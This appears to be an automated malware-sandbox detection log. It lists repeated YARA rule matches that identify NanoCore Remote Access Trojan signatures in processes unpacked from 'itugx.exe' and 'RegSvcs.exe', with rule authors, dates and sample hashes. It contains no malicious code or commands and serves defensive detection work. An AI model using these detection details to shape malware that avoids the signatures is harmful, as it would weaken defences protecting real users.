Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
